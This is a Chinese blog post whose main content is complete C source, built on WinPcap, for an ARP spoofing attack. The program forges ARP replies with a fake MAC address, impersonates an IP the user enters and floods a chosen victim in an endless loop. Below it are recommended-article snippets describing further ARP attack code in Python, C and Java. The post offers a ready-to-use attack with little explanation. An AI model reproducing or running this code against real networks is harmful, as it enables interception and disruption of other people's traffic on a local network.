Arp攻击代码

最新推荐文章于 2022-05-06 15:31:51 发布
最新推荐文章于 2022-05-06 15:31:51 发布
阅读量1.6k 收藏 4
点赞数 1
分类专栏: WinPcap
本文详细介绍了在WinPcap环境下实现ARP攻击的代码实现,包括设备选择、数据包构造和发送过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

以下便是WinPcap环境下的Arp攻击代码
#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>

int main()
{
pcap_if_t *alldevs;//定义一个网络接口的一个节点
pcap_if_t *d;
int i=0,inum=0,j;
char errbuf[PCAP_ERRBUF_SIZE];
u_char packet[60];
pcap_t *adhandle;
/* 获得设备列表 */
if (pcap_findalldevs(&alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}

/* 打印列表 */
for(d= alldevs; d != NULL; d= d->next)
{
printf("%d. %s", ++i, d->name);
if (d->description)
printf(" (%s)\n", d->description);
else
printf(" (No description available)\n");
}

if (i == 0)
{
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
return 0;
}
printf("Enter the interface number (1-%d):",i);
scanf("%d", &inum);
/* 跳转到选中的适配器 */
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* 打开适配器 */
if ( (adhandle= pcap_open_live(d->name, // 设备名
65536, // 要捕捉的数据包的部分
// 65535保证能捕获到不同数据链路层上的每个数据包的全部内容
1, // 混杂模式
1000, // 读取超时时间
errbuf // 错误缓冲池
) ) == NULL)
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
/* 释放设备列表 */
pcap_freealldevs(alldevs);
return -1;
}
printf("输入被攻击方的MAC地址(如FF-FF-FF-FF-FF-FF则为广播)\n");
scanf("%2x-%2x-%2x-%2x-%2x-%2x",&packet[0],&packet[1],&packet[2],&packet[3],&packet[4],&packet[5]);
/* 以太网目的地址*/

/* 以太网源地址,当然是假的 */
packet[6]=0x0e;
packet[7]=0x07;
packet[8]=0X62;
packet[9]=0x00;
packet[10]=0X01;
packet[11]=0x12;
/* 帧类型,0806表示ARP协议 */
packet[12]=0x08;
packet[13]=0x06;
/* 硬件类型,0001以太网 */
packet[14]=0x00;
packet[15]=0x01;
/* 协议类型,0800IP协议 */
packet[16]=0x08;
packet[17]=0x00;
/*硬件地址长度*/
packet[18]=0x06;

/*协议地址长度*/
packet[19]=0x04;
/* op,01表示请求,02表示回复 */
packet[20]=0x00;
packet[21]=0x02;
/*发送端以太网地址,同首部中以太网源地址*/
for(i=22;i<28;i++)
{
packet[i]=packet[i-16];
}
/*发送端IP地址*/
printf("输入<span style="font-family: Arial, Helvetica, sans-serif;">要假冒的ip地址\n");</span>
scanf("%d.%d.%d.%d",&packet[28],&packet[29],&packet[30],&packet[31]);
/*目的以太网地址,同首部中目的地址*/
for(i=32;i<38;i++)
{
packet[i]=packet[i-32];
}
/*目的IP地址,手动输入*/
printf("输入被攻击方的ip地址\n");
scanf("%d.%d.%d.%d",&packet[38],&packet[39],&packet[40],&packet[41]);
/*填充数据*/
for(j=42;j<60;j++)
{
packet[j]=0x00;<img src="https://img-blog.youkuaiyun.com/20150417193500838?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvWllOX0xFQVJOX0NPT0RJTkc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center" style="font-family: Arial, Helvetica, sans-serif;" alt="" />

}
/*在屏幕上输出数据报*/
for(i=0;i<60;i++)
{
printf("%x ",packet[i]);
}
//int k=10;
/*发送数据报*/
while(1)
{
pcap_sendpacket(adhandle, packet,60 );//一个装有要发送数据的缓冲区,要发送的长度,和一个适配器
printf("OK\n");
_sleep(1000);
//k--;
}
pcap_close(adhandle);
return 0;
}


Python编写的ARP攻击代码示例
ByteBuster的博客
10-05 703
在每次循环中,我们先发送虚假的ARP响应给目标设备,然后发送虚假的ARP响应给网关。这样,我们就欺骗了目标设备和网关,使其相信我们的MAC地址是合法的。同时,我们还记录了发送的数据包数量,并在控制台输出。攻击者可以通过发送虚假的ARP响应来欺骗目标设备,使其认为攻击者的MAC地址是合法的。请注意,ARP攻击是非法的,除非在合法的渗透测试或研究活动中使用。需要注意的是,进行ARP攻击是非法的,除非在合法的渗透测试或研究活动中使用。函数发送真实的ARP响应,将目标设备和网关的ARP表恢复到正常状态。
arp攻击程序代码
03-05
一般的arp spoof是向被欺骗主机发送ARP REPLY数据报,把其中的源IP地址置为被欺骗主机要发包去的主机地址,源MAC地址却改为自己的MAC地址。假设有两台机器A,B,发送一个ARP REPLY数据报给A,其中源IP地址为B的地址,源MAC地址为我的机器的MAC地址(IPRouter功能打开确保数据被转发),那么A发送到B的数据报就发到我的机器上了,同样对B做相同到操作,那么A<==>B之间的数据就会源源不断的通过我的机器转发,直到一个正常的ARP包更改了A,B的arp缓存为止。
arp攻击代码(收集)
weixin_30598225的博客
08-25 457
#include <stdlib.h> #include <stdio.h> #include <pcap.h> //winpcap的头文件 #include <winsock2.h> #include <process.h> //多线程编程的头文件 #include <windows.h> #include ...
ARP攻击原理和kali实现ARP攻击
热门推荐
cuttleKK的博客
10-28 1万+
目录一、ARP协议和ARP攻击1.ARP协议2.利用wireshark分析ARP数据包3.ARP攻击二、kali实现ARP攻击 一、ARP协议和ARP攻击 1.ARP协议 ARP协议,地址解析协议(Address Resolution Protocol),用来实现IP地址到物理地址的映射。 每一台主机都设有一个ARP高速缓存(ARP cache),里面有本局域网上的各主机和路由器的IP地址到硬件地址的映射表,主机如何获取这些地址的? 例如,主机A向本局域网上的某台主机B发送IP数据报时,要先在ARP高速缓存
ARP攻击测试代码(C)
styxqdz的专栏
11-01 927
  #include #include #include void main(int argc, char **argv){pcap_t *fp;char errbuf[PCAP_ERRBUF_SIZE];u_char packet[100];int j; pcap_if_t *alldevs;pcap_if_t *d;int inum;int i=0,m,n;  if
ARP攻击源码,C#+SharpPcap
03-01
一个参考用力,我也参考参考,能借用的代码绝对不能自己写。
ARP攻击代码ARP欺骗)
PPPPPPPKD的博客
05-06 2513
一、ARP攻击 ARP欺骗攻击原理: ARP欺骗攻击建立在局域网主机间相互信任的基础上的。 比如:假设A、B、C在同一个局域网中,网关为192.168.43.1,IP地址和MAC地址分别假设如下。假设C是攻击者。 当A发广播询问:我是192.168.43.2,硬件地址macA,我想知道主机IP是192.168.43.3的硬件地址。 此时B回应:我是192.168.43.3,硬件地址是macB。 如果此时IP地址是192.168.43.4的C非法回应:我是IP192.168.43.3,我的硬件地址是macC
python写的ARP攻击代码实例
01-20
复制代码 代码如下:#coding:utf-8#example :sudo python arp_dos.py 192.168.1.103 from scapy.all import ARP,sendimport os,re,sys def get_gateway_ip(): t=os.popen(‘route -n’) for i in t: if i.starts...
arp攻击代码
10-29
arp攻击代码
JAVA ARP攻击代码完整导出教程
- 文件标题中提到“JAVA代码实现ARP攻击”,表明此工程中包含Java语言编写的源代码。Java作为一种面向对象的编程语言,具有跨平台、面向对象、安全性高等特点,常用于企业级应用的开发。 2. **网络基础知识**: -...
ARP攻击代码实例
10-31
现在有一台计算机A(IP:192.168.85.1 MAC:AA-AA-AA-AA-AA-AA),另一台计算机B(IP:192.168.85.100 MAC:BB-BB-BB-BB-BB-BB)现在用A去 ping B。看见 Reply from 192.168.85.100: bytes=32 time<10ms TTL=32 这样的信息。然后在运行中输入arp -a,会看见 192.168.8.100 BB-BB-BB-BB-BB-BB dynamic这样的信息。那就是arp高速缓存中IP地址和MAC地址的一个映射关系,在以太网中,数据传递靠的是MAC,而并不是IP地址。其实在这背后就隐藏着arp的秘密。你一定会问,网络上这么多计算机,A是怎么找到B的?那么我们就来分析一下细节。首先A并不知道B在哪里,那么A首先就会发一个广播的ARP请求,即目的MAC为FF-FF-FF-FF-FF-FF,目的IP为B的192.168.85.100,再带上自己的源IP,和源 MAC。那么一个网段上的所有计算机都会接收到来自A的ARP请求,由于每台计算机都有自己唯一的MAC和IP,那么它会分析目的IP即 192.168.85.100是不是自己的IP?如果不是,网卡会自动丢弃数据包。如果B接收到了,经过分析,目的IP是自己的,于是更新自己的ARP高速缓存,记录下A的IP和MAC。然后B就会回应A一个ARP应答,就是把A的源IP,源MAC变成现在目的IP,和目的MAC,再带上自己的源IP,源 MAC,发送给A。当A机接收到ARP应答后,更新自己的ARP高速缓存,即把arp应答中的B机的源IP,源MAC的映射关系记录在高速缓存中。那么现在A机中有B的MAC和IP,B机中也有A的MAC和IP。arp请求和应答过程就结束了。由于arp高速缓存是会定时自动更新的,在没有静态绑定的情况下,IP和MAC的映射关系会随时间流逝自动消失。在以后的通信中,A在和B通信时,会首先察看arp高速缓存中有没有B的IP和MAC的映射关系,如果有,就直接取得MAC地址,如果没有就再发一次ARP请求的广播,B再应答即重复上面动作。 好了在了解了上面基本arp通信过程后,arp欺骗就不那神秘了,计算机在接收到ARP应答的时候,不管有没有发出ARP请求,都会更新自己的高速缓存。利用这点如果C机(IP:192.168.85.200 MAC:CC-CC-CC-CC-CC-CC)伪装成B机向A发出ARP应答,自己伪造B机的源MAC为CC-CC-CC-CC-CC-CC,源IP依旧伪造成B的IP即192.168.85.100,是那么A机的ARP缓存就会被我们伪造的MAC所更新,192.168.85.100对应的MAC就会变成CC-CC-CC-CC-CC-CC.如果A机再利用192.168.85.100即B的IP和B通信,实际上数据包却发给了C机,B机根本就接收不到了。实例基于WINCAP编写,描述其本源理与流程.
JAVA代码实现ARP攻击 工程完整导出可直接导入
11-28
MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,
arp欺骗C++实现
10-15
arp欺骗原理及实现 用c++实现 无界面控制台程序
C语言实现ARP攻击
03-21
利用C语言实现ARP攻击,完成了断开目标网络以及接受并转发目标流量的功能
用C++实现的对网络上的ARP数据包进行解析
05-22
本课程设计的目的是设计一个系统,它能够实现对网络上的ARP数据包的解析,从而熟悉ARP数据包的结构,对ARP协议有更好的理解和认识。了解并熟悉Microsoft Visual C++ 6.0开发环境的使用,在该软件平台上进行工程的建立和程序开发,理解和掌握C++语言的程序设计和针对一些常用的网络协议的编程。
转贴-------ARP攻击C语言代码
weixin_30467087的博客
05-26 467
ARP攻击C语言代码代码基本不具备危害性,只是通过MAC地址欺骗修改服务器缓冲区信息实现消息拦截。 假设被攻击服务器 IP 地址为 192.168.20.8 ,MAC地址为 00:0C:29:BD:1C:EF 被拦截消息计算机IP地址为 192.168.20.9 本机MAC 地址为 00:0C:29:AF:FB:D3 #include<stdio....
编码实现ARP欺骗攻击
qq_39395533的博客
02-20 4363
首先使用攻击工具进行攻击,根据抓包结果,分析ARP欺骗实验的原理。然后根据原理,进行编码实现ARP欺骗攻击
ARP攻击
Jaychouzzk
07-24 2284
目标机器: IPv4 地址 . . . . . . . . . . . . : 192.168.1.101 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 192.168.1.1 攻击机器: IPv4 地址 . . . . . . . . . . ....
arp攻击代码--自己手动填入arp
w1242245的专栏
04-29 5413
windows: //#if 0 #define _CRT_SECURE_NO_DEPRECATE #include "pcap.h" //#include #include #pragma comment(lib, "Iphlpapi.lib") #pragma comment(lib,"wpcap") #pragma comment(lib,"ws2_32") //===
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值